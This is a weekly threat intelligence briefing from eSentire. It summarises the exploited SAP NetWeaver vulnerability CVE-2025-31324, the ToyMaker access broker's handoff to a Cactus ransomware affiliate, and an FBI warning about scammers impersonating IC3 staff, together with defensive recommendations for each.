eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.
Recent Threat Intelligence Advisories
Noteworthy News
New Critical Vulnerability in SAP NetWeaver
Bottom Line: SAP disclosed a maximum severity vulnerability in SAP NetWeaver. Exploitation has been confirmed, raising the criticality for immediately applying the relevant security patches.
On April 24th, SAP disclosed a maximum severity vulnerability impacting SAP NetWeaver systems. SAP NetWeaver is a software platform for integrating applications, processes, and data from various sources; it is commonly used in IT and government organizations. The vulnerability, tracked as CVE-2025-31324 (CVSS: 10), is a missing authorization vulnerability found in SAP NetWeaver (Visual Composer development server), version 7.50. Unauthenticated threat actors may exploit the vulnerability to upload malicious executable binaries, leading to a compromise of the host system.
The vulnerability was discovered following an investigation by ReliaQuest into multiple incidents involving the compromise of the SAP NetWeaver platform. The activity was initially suspected to be a remote file inclusion issue but was later categorized as an unrestricted file upload vulnerability and identified as CVE- 2025-31324 by SAP.
In observed attacks, threat actors exploited the vulnerability by uploading Java Server Pages (JSP) webshells through POST requests to the developmentserver. Once deployed, the webshells allowed the threat actors to upload unauthorized files, gain additional control over compromised systems, execute remote code, and potentially exfiltrate sensitive data by storing it in publicly accessible directories. The attackers deployed Brute Ratel, a Command-and-Control (C2) framework, typically used by penetration testers. Brute Ratel was retrieved from an external server and was leveraged to inject malicious code into the compromised system’s memory. The framework allowed attackers to maintain C2 access over compromised systems, customize payloads, and perform various post-exploitation activities.
As exploitation of CVE-2025-31324 has been confirmed, it is critical that all organizations using SAP NetWeaver systems apply the relevant security patches as soon as possible.
eSentire Threat Intelligence Analysis:
Organizations using SAP NetWeaver are strongly encouraged to apply the security patches released on April 24th. In addition to patching, it is important to review all suspicious file uploads to ensure that webshells were not deployed. Webshells would enable persistent access and is not remediated via patch deployment. If patching is not immediately possible, alternative mitigations including disabling the Visual Composer Metadata Uploader and application alias “developmentserver” is recommended. Organizations may also restrict access to the development server application URL, to minimize the likelihood of exploitation.
Based on publicly available information, it is probable that a single threat actor group is currently targeting CVE-2025-31324. The publication of vulnerability details is likely to attract other threat actors and may lead to an increase in activity. At the time of writing, current activity has not been attributed to a specific group. ReliaQuest noted a significant delay between the initial access and post exploitation activities, leading to the conclusion that the attacker is likely an Initial Access Broker (IAB), who gained access for the purpose of selling it to other threat actors. IABs are commonly associated with ransomware deployment, although this activity has not been observed by ReliaQuest.
In response to the disclosure of CVE-2025-31324, eSentire MDR for Network detections were created, threat hunts were performed, and an advisory on the topic was released on April 25th . Additionally, eSentire maintains detections for both webshell deployment and use of the Brute Ratel tool. For more information on this threat, including eSentire actions and recommendations, see the eSentire advisory Maximum Severity SAP Vulnerability Exploited.
Introducing ToyMaker, an Initial Access Broker
Bottom Line: Details have emerged on a recently observed Initial Access Broker, ToyMaker, that has been identified exploiting vulnerable Internet-facing devices to deploy custom malware. Access to compromised organizations is being sold to secondary threat actors to conduct further attacks.
Cisco's latest report on ToyMaker, a financially motivated threat actor group highlights an extensive compromise in a critical infrastructure enterprise consisting of a combination of threat actors. The compromise began by exploiting internet-facing systems using custom tools to establish a foothold. ToyMaker deployed a proprietary backdoor named "LAGTOY" and extracted credentials using memory dumps, preparing the environment for subsequent threat actor activity. After initial reconnaissance, credential harvesting, and backdoor deployment within one week, ToyMaker ceased activity, showing no evidence of data exfiltration or lateral movement. Approximately three weeks later, an affiliate member of the Cactus ransomware group used credentials stolen by ToyMaker to infiltrate the same enterprise and initiate a ransomware campaign. Talos assesses that ToyMaker's role was limited to acquiring and selling access, indicating their financial motivations and no objective of espionage.
ToyMaker primarily used LAGTOY, a custom backdoor capable of creating reverse shells, executing commands, and persisting via a Windows service named ‘WmiPrvSV’. The malware includes anti-debugging techniques, such as registering a custom unhandled exception filter, and features unique time- based logic for command execution and C2 beaconing.
About a month later, the Cactus ransomware affiliate leveraged ToyMaker's stolen credentials to gain access and deploy their own malware tools across the victim network. They conducted network reconnaissance using WSMAN discovery scripts to identify endpoints supporting PowerShell remoting.
For data exfiltration, tools like 7-Zip, curl, and WinSCP were used to archive and transfer files containing customer data and sensitive enterprise information. The group utilized various remote administration tools including AnyDesk, eHorus, RMS Remote Admin, and OpenSSH to maintain persistent access. They also established reverse shells using OpenSSH, with scheduled tasks configured to reach out to the C2 server hourly. The Cactus affiliate deleted SSH private keys post-exfiltration to hinder forensic analysis and conceal their tracks. On some systems, they created unauthorized user accounts. The attackers rebooted infected hosts into Safe Mode to disable or bypass security products and further establish their presence in the environment. They also deployed Metasploit injected binaries such as modified PuTTY and ApacheBench to execute code and communicate with the same C2 server across multiple ports.
eSentire Threat Intelligence Analysis:
This event emphasizes the growing trend of threat actors becoming more specialized within the cybercrime ecosystem. ToyMaker acted purely as an access broker, compromising the target environment and then selling access rather than engaging in further exploitation. Access brokers like ToyMaker are becoming a critical link in the ransomware supply chain, offering pre-compromised environments to affiliate members of ransomware groups. From initial access to double extortion, these actors slowly and steadily compromised a multitude of hosts in the network using a combination of various tools. The group targets valuable data within the victims' environment. The exposure of sensitive information to other threat actor groups leads to long-lasting consequences, as stolen data can resurface months or even years after the initial breach. Hence it is essential for organization to track and enhance visibility over early-stage intrusion indicators.
The attack was conducted in two distinct phases over a multi-week period. ToyMaker's initial access became inactive before Cactus affiliate members started their activities again weeks later. Hence such events are crucial to be monitored beforehand to prevent further stages of compromise. Organizations must also maintain active vulnerability scanning, prioritize patching of critical CVEs with public Proof-of-Concept (PoCs), and monitor for unusual network traffic. The report also specifies that attackers rebooted machines into Safe Mode, a tactic to disable endpoint detection and antivirus protections. Security tools often do not load or function in Safe Mode. This tactic helps adversaries disable endpoint protection software completely; hence, organizations must monitor system boot sequences for irregular patterns, especially within high-value systems.
In response to the release of this report, the eSentire Threat Intelligence team is actively monitoring this topic and exploring new detection opportunities. The eSentire Threat Intelligence team has performed threat hunts across the customer base, and known malicious infrastructure is blocked via the eSentire Global Block List. The use of remote access tools in this intrusion highlights the importance of restricting such tools through policy enforcement, permitting their use only when necessary for regular operations. For additional insights into how threat actors are gaining initial access and exploiting legitimate Remote Monitoring and Management (RMM) tools, the eSentire Threat Intelligence team has provided an in-depth analysis in the October eSentire TRU Intelligence Briefing webinar.
FBI Warns of Scam Involving Threat Actors Posing as IC3 Employees
Bottom Line: The FBI has issued a Public Service Announcement warning of a scam where individuals impersonate FBI Internet Crime Complaint Center employees to deceive and defraud victims of previous financial scams, exploiting their vulnerability and desperation for assistance in recovering lost funds.
On April 18th, the FBI released a Public Service Announcement (PSA), providing details on a scam that has been reported since December 2023. The scam involves threat actors posing as employees of the FBI's Internet Crime Complaint Center (IC3), with the purpose of defrauding victims of previous financial scams. Initial contact has varied between reports and has consisted of victims receiving emails, phone calls, or being contacted online, through either social media or online forums. The ruse involves threat actors claiming to have recovered funds that the victims have initially lost in previous financial scams.
One example provided by the FBI involved threat actors creating female persona profiles on social media websites and using these profiles to join groups for financial fraud victims. The scammers claim that they themselves are victims of financial scams and recommend that users can reach out to “Jaime Quin” over Telegram, a threat actor posing as the “Chief Director” of IC3. When contacted, the threat actor indicates that they have recovered the victims previously stolen funds and uses this ruse to gain access to their financial information to revictimize them.
Within their PSA, the FBI highlights that the IC3 will never directly communicate with individuals via phone, email, social media, apps, or public forums. Individuals will be contacted by FBI employees from local field offices, or other law enforcement agencies. The FBI notes that tactics and aliases for these scams will change over time, but that threat actors will consistently request sensitive information from victims, including banking information, Social Security Numbers (SSNs), or other Personal Identifiable Information (PII).
eSentire Threat Intelligence Analysis:
Details of this scam indicate that threat actors are targeting victims of previous financial scams, in an attempt to revictimize them. Targeting victims of previous scams as a tactic is a likely attempt to exploit individuals who may be believed to be more susceptible to falling victim to this scam, based on their history. The attacks may also be exploiting the desperation of these victims, who have already lost funds to previous financial scams, and are seeking to recover them. The FBI indicates that they received over 100 complaints of this scam between December 2023 and February 2025, but the number of actual victims is likely higher but have gone unreported due to factors such as embarrassment, shame, or self-blame.
Threat Actors posing as government officials to conduct financial scams is not a novel technique, with many recent examples of similar tactics used in previous attacks. In March 2022, the FBI released a PSA providing details on a scam involving threat actors spoofing phone numbers of government and law enforcement agencies to extort money or steal PII from victims. Additional examples include scams in Europe, where threat actors posed as Europol agents or financial advisors, or in Canada where threat actors posed as agents of the Canada Revenue Agency (CRA), with both involving attempts to defraud victims for financial gain.
On April 23rd, 2025, the FBI IC3 released their annual Internet Crime Report for 2024, which indicates that Americans lost $16.6 billion in online scams in 2024, which is up 33% from 2023. The FBI reports that the average loss for victims of financial scams in 2024 was $19,000, with seniors (individuals over the age of 60) being the group with the largest losses to financial scams, with a total loss of $4.8 billion. These statistics highlight the cost of financial scams on the individual, while demonstrating how financially lucrative they can be for attackers. This suggests that these scams will likely continue to be used, and adapted, in the future for financially motivated attackers. In order to prevent users from falling victim to these scams, organizations should implement Phishing and Security Awareness Training (PSAT) programs, which can be used to teach users how to identify and report malicious content.
About the threat briefings:
The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.
